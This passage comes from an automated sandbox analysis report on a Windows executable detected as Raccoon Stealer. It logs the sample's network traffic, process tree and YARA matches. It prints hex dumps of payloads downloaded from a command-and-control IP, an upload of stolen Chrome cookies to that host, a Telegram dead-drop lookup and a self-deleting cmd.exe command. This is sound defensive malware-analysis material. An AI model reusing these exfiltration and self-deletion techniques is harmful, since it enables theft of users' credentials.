6d 4e 6a 31 56 34 55 59 6e 44 73 52 2f 64 39 78 54 57 35 74 69 50 66 79 67 37 35 6f 44 7a 32 4f 71 7a 70 61 50 65 53 73 4d 30 6d 65 43 30 4e 48 65 77 41 4d 34 63 66 7a 4c 2b 66 57 54 39 6f 4d 4c 79 42 37 65 52 4b 69 53 64 69 31 78 73 50 4f 5a 4c 7a 32 63 4b 6c 78 64 6a 4b 79 6c 6d 4e 36 48 51 38 33 73 51 70 49 43 41 61 61 51 77 74 6a 4e 77 7a 61 46 62 38 68 5a 78 52 53 79 58 38 7a 55 6b 76 6f 2f 7a 68 51 32 47 30 6a 42 72 6e 70 2b 34 63 65 35 48 41 41 31 34 6b 44 78 64 6a 4a 71 2f 30 76 53 39 58 77 48 51 6a 6b 6e 30 63 4a 2f 34 36 45 73 54 2f 7a 46 79 6d 36 73 78 31 33 65 72 4c 51 4d 78 59 73 7a 76 57 62 76 57 65 49 49 57 74 78 76 61 53 52 47 48 36 56 61 70 35 4a 34 7a 33 79 56 55 67 6d 6e 6c 58 69 6a 38 73 39 4d 66 4c 67 78 39 41 38 46 79 7a 43 44 72 79 4d 7a 63 63 6d 43 4d 59 6c 30 70 48 4b 66 63 57 4d 30 50 6e 38 38 72 58 68 7a 36 4a 42 4c 2f 41 35 4a 4f 51 2f 74 38 56 33 35 65 78 70 78 6b 75 42 2b 4e 64 36 4f 62 62 45 68 35 7a 6b 49 57 68 5a 63 53 6a 34 4f 53 51 6d 38 2b 55 4f 4b 49 4a 59 45 75 75 2b 6d 4a 6f 78 71 47 4b 73 36 2f 79 78 36 71 2f 76 43 38 77 44 77 38 55 62 65 55 58 35 74 58 6a 4c 31 65 79 78 33 38 42 31 4e 30 6f 65 37 31 68 46 59 61 58 36 72 50 63 4a 44 34 39 75 79 47 72 63 6b 53 6b 57 2b 55 31 4c 67 56 4b 39 5a 2f 69 57 45 45 50 31 6c 68 5a 62 44 6e 38 76 4f 76 6c 79 4c 6d 4d 36 6e 31 78 63 58 70 75 4a 69 73 79 72 2b 78 6b 46 6f 5a 74 6e 77 4f 68 59 36 6f 2f 37 34 33 66 41 51 76 6a 4e 6b 6b 56 76 50 76 47 43 4d 7a 42 69 51 67 6b 47 45 6c 6d 62 6b 2b 42 71 59 49 73 33 6b 39 6e 6d 6c 59 74 63 74 34 39 2b 79 74 6c 33 6b 4c 39 6c 33 4f 6a 39 7a 44 49 63 35 73 38 65 4e 64 33 34 56 56 4d 67 2b 6e 5a 75 56 52 4d 74 73 69 45 63 6d 79 6c 36 71 78 76 65 61 47 34 51 2b 6e 61 43 78 56 6c 63 7a 52 6a 43 46 6d 50 68 46 39 57 71 4b 35 76 2f 4f 57 57 33 63 30 7a 74 35 31 4c 75 32 56 31 68 66 47 63 56 68 57 65 4e 68 2f 4f 47 61 4b 5a 58 4e 75 63 4d 38 75 65 6e 33 30 73 65 78 33 76 6a 4a 6a 66 66 41 79 7a 67 6a 77 34 73 61 6b 66 77 31 31 5a 62 76 51 31 72 68 68 44 4b 4d 2f 44 69 4f 72 47 75 76 78 68 67 30 2b 75 68 54 48 46 4a 4d 43 46 53 6e 50 72 Data Ascii: 1714unN2GK+nPmd88djLs8MEy55RM+acetOzyrgIgg3WAOVMT0Fbn38HbQZ2rufTPvm8wKVq28x0Zm3HXX+r84g2qtF9hobWuWUdPHpbre9s6f9UbANaGNzFCLeY2F+Y6ZAMBfr3FOUR4b124vbL7XayDSfkgVl7FfwhmuYytO5JN0BtYOTi/CsK2lo7SeIlcYsVYJ5yH8pgZopTiGlh4I11gWQoStMqPb4pPdGP6mvDgHIV7DnsshUkd1WGfE7lNnlkI3qy/5rI5MhwHiJzXMoXj1jbvxLdalvPffXHggZDPr4lfEoEajyCsGSsq7JNxYUeLyYC7iEWoyFk7kQJq3scTUjke4hYG5pkAnurvXTVukF1iJcAxR49Qms6nQeguV0SiTmI3d3iefQpAsTaQShm+B9OF8njCJ+AwCVmNj1V4UYnDsR/d9xTW5tiPfyg75oDz2OqzpaPeSsM0meC0NHewAM4cfzL+fWT9oMLyB7eRKiSdi1xsPOZLz2cKlxdjKylmN6HQ83sQpICAaaQwtjNwzaFb8hZxRSyX8zUkvo/zhQ2G0jBrnp+4ce5HAA14kDxdjJq/0vS9XwHQjkn0cJ/46EsT/zFym6sx13erLQMxYszvWbvWeIIWtxvaSRGH6Vap5J4z3yVUgmnlXij8s9MfLgx9A8FyzCDryMzccmCMYl0pHKfcWM0Pn88rXhz6JBL/A5JOQ/t8V35expxkuB+Nd6ObbEh5zkIWhZcSj4OSQm8+UOKIJYEuu+mJoxqGKs6/yx6q/vC8wDw8UbeUX5tXjL1eyx38B1N0oe71hFYaX6rPcJD49uyGrckSkW+U1LgVK9Z/iWEEP1lhZbDn8vOvlyLmM6n1xcXpuJisyr+xkFoZtnwOhY6o/743fAQvjNkkVvPvGCMzBiQgkGElmbk+BqYIs3k9nmlYtct49+ytl3kL9l3Oj9zDIc5s8eNd34VVMg+nZuVRMtsiEcmyl6qxveaG4Q+naCxVlczRjCFmPhF9WqK5v/OWW3c0zt51Lu2V1hfGcVhWeNh/OGaKZXNucM8uen30sex3vjJjffAyzgjw4sakfw11ZbvQ1rhhDKM/DiOrGuvxhg0+uhTHFJMCFSnPr
Sep 28, 2021 07:38:32.506295919 CEST	959	IN	Data Raw: 46 4b 37 75 70 4c 54 31 6f 39 56 38 49 38 4b 30 58 53 69 4a 57 70 4e 48 34 77 2f 30 55 33 6c 62 53 35 71 4e 70 36 65 4b 72 64 68 52 6d 76 49 68 4b 75 55 66 70 62 44 56 4e 4d 64 5a 45 49 6e 73 4c 31 61 56 38 6a 58 38 57 38 4c 2f 4d 44 55 34 79 48 Data Ascii: FK7upLT1o9V8I8K0XSiJWpNH4w/0U3lbS5qNp6eKrdhRmvIhKuUfpbDVNMdZEInsL1aV8jX8W8L/MDU4yHFKjvCVwMHqCohydJEXhIymg8m+EMxn/nmkpqJYDQO4nYXkJ/9zEtlXHEu96xCM+ALK32pu2j5QCnbX4oiVAdPPu4xEYb1WVqVF4xJ+5YreiS7X/OPZvC7tv+53fZFvYEpPdlOdqN+LxSipV/6GSjkiYjeZP7mmd8F
Sep 28, 2021 07:38:32.506318092 CEST	960	IN	Data Raw: 53 70 44 64 30 36 4f 72 45 73 49 70 61 54 4f 56 58 6b 33 53 41 57 47 78 76 54 79 4c 6d 66 70 79 75 77 2b 65 35 59 48 57 77 2f 78 6a 77 69 6e 36 62 37 53 74 4a 58 49 53 73 2f 32 71 43 42 43 4d 7a 4d 32 7a 56 6c 2f 78 31 46 58 37 58 55 78 59 30 69 Data Ascii: SpDd06OrEsIpaTOVXk3SAWGxvTyLmfpyuw+e5YHWw/xjwin6b7StJXISs/2qCBCMzM2zVl/x1FX7XUxY0iNTOjG/cdHbwqse2w1r4yMkZgfffY/88fy6wiHROGJsyxunuNTvCim5JBpi88ILiD9W8BbwItftVRP7Scoz0qP82w5RQgyzTaUST8Oq+kn+hWJRJylWtOcsm9HEGGwT/B2VyH0HSDNuyXWQ6m3xr6mxxlNV9sw5b5m
Sep 28, 2021 07:38:32.506344080 CEST	962	IN	Data Raw: 56 6a 42 6c 2f 4a 55 65 50 4e 42 6f 61 76 2b 38 62 71 57 4e 70 4d 2f 39 39 70 41 2f 36 49 4f 41 64 2b 53 43 61 37 53 54 61 61 2b 76 5a 4d 62 41 56 6f 6e 47 64 54 77 49 43 4d 79 34 6c 42 4b 42 64 38 6b 63 38 52 47 6e 6c 4f 55 37 74 71 4c 38 62 46 Data Ascii: VjBl/JUePNBoav+8bqWNpM/99pA/6IOAd+SCa7STaa+vZMbAVonGdTwICMy4lBKBd8kc8RGnlOU7tqL8bFEDcNr488Lxi4mTiBcTGgp35/TYKoS50jCCz2N5f0w53/2lmFJZmOm7WsfEuTobXqefc7YqpR4xrq83GCbCsT5rBu2dTtA3PqjP1BrwRVYj78JAkaVyI1fu3f4+TFpx+VsizApmSgTYbvf3NcGZko0qqFF8srAMNiU
Sep 28, 2021 07:38:32.506367922 CEST	963	IN	Data Raw: 41 69 78 33 41 76 36 45 55 71 32 72 2f 63 6c 49 77 47 6d 57 49 6f 4f 2b 75 6f 4f 35 78 54 58 2f 46 6d 6b 57 6e 68 34 57 2f 78 33 2f 59 47 46 65 34 6b 67 68 57 49 2f 74 73 35 6e 5a 75 76 56 31 47 32 49 49 69 59 73 4f 68 6a 59 50 59 4c 7a 65 5a 78 Data Ascii: Aix3Av6EUq2r/clIwGmWIoO+uoO5xTX/FmkWnh4W/x3/YGFe4kghWI/ts5nZuvV1G2IIiYsOhjYPYLzeZxitg4jv8XGZ/eeNJVyd6YaH8XXjzDVaUt13QjkmYVwH9u9uOfHJH7RRgMD2F6+XZ6Mm0BXMQSyVgbk8QJ3ryX0xdEwK6pgcQIdBouRXW+4cvJxpQHqBzSEcJWfclnmwQYcLFa5be5H8qLbtVBlAnoEE38kF7D0oOJu
Sep 28, 2021 07:38:32.506383896 CEST	963	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Sep 28, 2021 07:38:32.515163898 CEST	963	OUT	GET //l/f/GpHpKnwB3dP17SpzaKnS/9801dace6a5ab5b92aa19fd0ea4e73710d7a6a98 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.138.164.150
Sep 28, 2021 07:38:32.743393898 CEST	964	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 28 Sep 2021 05:38:32 GMT Content-Type: application/octet-stream Content-Length: 916735 Connection: keep-alive Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT ETag: "612fa893-dfcff" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 bc 08 00 00 00 60 0c 00 00 0a 00 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 69 02 00 00 00 70 0c 00 00 04 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 d3 1c 00 00 00 80 0c 00 00 1e 00 00 00 ee 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 90 02 00 00 00 a0 0c 00 00 04 00 00 00 0c 0c 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt\!Zpa H 03.textXXZ`P`.datap`@`.rdata \|@`@.bss(`.edata "@0@.idataH@0.CRT,@0.tls @0.rsrc @0.reloc304@0B/4p@@B/19@B/31 @B/45@@B/57`@0B/70ip@B/81@B/92
Sep 28, 2021 07:38:32.743428946 CEST	966	IN	Data Raw: 00 00 00 00 00 40 00 10 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @B
Sep 28, 2021 07:38:32.743457079 CEST	967	IN	Data Raw: e8 42 1c 09 00 83 ec 0c 85 c0 89 c5 0f 85 5a ff ff ff 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 21 1c 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 fa 1b 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 73 fc Data Ascii: BZ\|$D$4$!\|$D$4$\|$D$4$s\|$D$4$'aT$$tL$(D$ M&T$T$U=at9$a`aQtD$
Sep 28, 2021 07:38:32.743474960 CEST	967	IN	Data Raw: 04 24 ff d2 c9 c3 31 c0 c3 55 31 c0 ba 01 00 00 00 89 e5 83 ec 10 dd 45 08 dd 5d f0 dd 45 f0 dd 5d f8 dd 45 f0 dd 45 f8 c9 df e9 dd d8 0f 9a c0 0f 45 c2 c3 85 c0 74 4d 0f b6 08 80 b9 60 a4 ea 61 00 89 ca 79 3f 55 Data Ascii: $1U1E]E]EEEtM`ay?U
Sep 28, 2021 07:38:32.743771076 CEST	969	IN	Data Raw: 80 f9 5b b1 5d 0f 44 d1 b9 01 00 00 00 89 e5 57 56 53 be 01 00 00 00 8a 1c 08 8d 7e ff 38 da 75 0d 3a 54 08 01 75 0f 88 54 30 ff 41 eb 04 88 5c 30 ff 41 46 eb e1 5b c6 04 38 00 5e 5f 5d c3 55 89 e5 57 56 89 c6 53 31 db 0f b6 0c 1e 0f b6 3c 1a 89 Data Ascii: []DWVS~8u:TuT0A\0AF[8^_]UWVS1<`a`a)uCu[^_]UEUu1t]]UWVMSU}u1KtBOG1x4`a`a)t2`
Sep 28, 2021 07:38:32.743796110 CEST	970	IN	Data Raw: 01 76 54 b9 28 00 00 00 83 e9 0a 01 c0 11 d2 83 fa 00 77 34 83 f8 07 76 ef eb 2d 3d ff 00 00 00 76 1f 0f ac d0 04 83 c1 28 c1 ea 04 83 fa 00 77 f1 eb e8 83 f8 0f 76 10 0f ac d0 01 83 c1 0a d1 ea 83 fa 00 77 f2 eb eb 83 e0 07 66 8b 84 00 ec 2f ea Data Ascii: vT(w4v-=v(wvwf/aL]t+UVSX94uDL0911[^]U1@Ht`aiy7]UWVSSXtM1M6X0Xp1tC
Sep 28, 2021 07:38:37.212371111 CEST	1914	OUT	GET //l/f/GpHpKnwB3dP17SpzaKnS/405431785963a051c32213179fa2e9bea8d07aae HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.138.164.150
Sep 28, 2021 07:38:37.477823019 CEST	1915	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 28 Sep 2021 05:38:37 GMT Content-Type: application/octet-stream Content-Length: 2828315 Connection: keep-alive Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT ETag: "612fa893-2b281b" Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8 b5 4e a5 3e 11 54 3f 57 4d ea 16 11 b1 29 39 42 d6 86 ce a3 f6 8e bf 00 9e ec 07 96 d8 0f 1c 6d 56 57 b4 9a 9b 8b bb ed 07 62 80 36 7b e5 11 7c 21 da 0f bc 08 ef d4 4f ec 07 12 01 4d 1a 89 8a e5 3e d6 3e c3 24 5c 2e 25 d4 d7 4c d2 88 7a 46 93 6c d0 a5 f6 03 33 9a 95 9d 01 b3 7c 08 b0 30 23 2a 4e 2b ee b7 1f 38 c4 9b e7 35 db 0f c0 ef 4e af e8 8a 55 34 2b 62 80 15 66 53 ff 03 32 3a 63 f6 8e 1f 03 7a e5 b6 04 c0 31 43 a9 1f 92 b6 da 0f 40 41 cd 9d 5a f8 26 b5 d6 a1 f6 95 77 6f 13 d5 d7 e2 16 fb 81 c3 00 52 40 04 Data Ascii: PKznN<{rinssdbm3.dll\|8NY6$J$1D a.jLVCN;}/$Z,TRqcEc=;{sp`A?MW!a?N~eAWo[},;+\Jw\|k<yR^Eonxsc=V,FcuwO[u{<w7P{K~Ewcz^[Z6GV2+n41M.w{fnJL{ dM+ /)$X!LK`MwILA8rIXr87}<]rTWmb6/_aWlB3n_joMz_Q8KgrLH.v6[4I{1g<>M$G&Y-O9\,tWmX Y3S<#}">0RBg,lh.sorp8)3Kvdsn3+]+krMu_Y\/8T&BC"u;ek u$~`{!M\WY37+nQZ3\G5dZhVLZ\|k5XFYlVVWC\|b\Zm 0PF8{]UpRW,nMMs_@>Q N>T?WM)9BmVWb6{\|!OM>>$\.%LzFl3\|0#N+85NU4+bfS2:cz1C@AZ&woR@
Sep 28, 2021 07:38:39.384624958 CEST	4856	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV Content-Length: 1404 Host: 185.138.164.150
Sep 28, 2021 07:38:39.384735107 CEST	4858	OUT	Data Raw: c8 14 4c 05 22 0d 0a 2d 2d 76 44 32 74 4c 31 71 43 39 62 43 33 7a 56 39 65 44 39 79 58 38 64 55 38 79 59 38 6c 43 31 63 56 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 47 Data Ascii: L"--vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVcontent-disposition: form-data; name="GpHpKnwB3dP17SpzaKnS"; filename="GpHpKnwB3dP17SpzaKnS.zip"Content-Type: application/octet-streamPK=<Sc*browsers/cookies/Google Chrome
Sep 28, 2021 07:38:39.675101042 CEST	4858	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 28 Sep 2021 05:38:39 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: * Data Raw: 32 38 0d 0a 35 31 34 63 30 30 38 61 64 35 30 36 37 61 39 62 38 37 61 32 39 30 31 37 34 63 37 31 63 34 31 32 34 38 61 35 65 35 36 35 0d 0a 30 0d 0a 0d 0a Data Ascii: 28514c008ad5067a9b87a290174c71c41248a5e5650

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49730	149.154.167.99	443	C:\Users\user\Desktop\Aqlmlmmeey.exe

Timestamp	Direction	Data
2021-09-28 05:38:31 UTC	OUT	GET /agrybirdsgamerept HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Host: t.me
2021-09-28 05:38:31 UTC	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:38:31 GMT Content-Type: text/html; charset=utf-8 Content-Length: 4595 Connection: close Set-Cookie: stel_ssid=cc955de4bfd4a6ef0a_9320274967960160689; expires=Wed, 29 Sep 2021 05:38:31 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=35768000
2021-09-28 05:38:31 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e 0a 3c 6d 65 74 61 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @agrybirdsgamerept</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="agrybirdsgamerept"><meta

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Aqlmlmmeey.exe PID: 5164 Parent PID: 5248

General

Start time:	07:38:27
Start date:	28/09/2021
Path:	C:\Users\user\Desktop\Aqlmlmmeey.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Aqlmlmmeey.exe'
Imagebase:	0x400000
File size:	553984 bytes
MD5 hash:	C1258CE5CDC59BE3CF83F8DE7A42E899
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000002.271763487.00000000030C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000003.250736320.0000000003150000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 1700 Parent PID: 5164

General

Start time:	07:38:39
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\Aqlmlmmeey.exe'
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4680 Parent PID: 1700

General

Start time:	07:38:39
Start date:	28/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
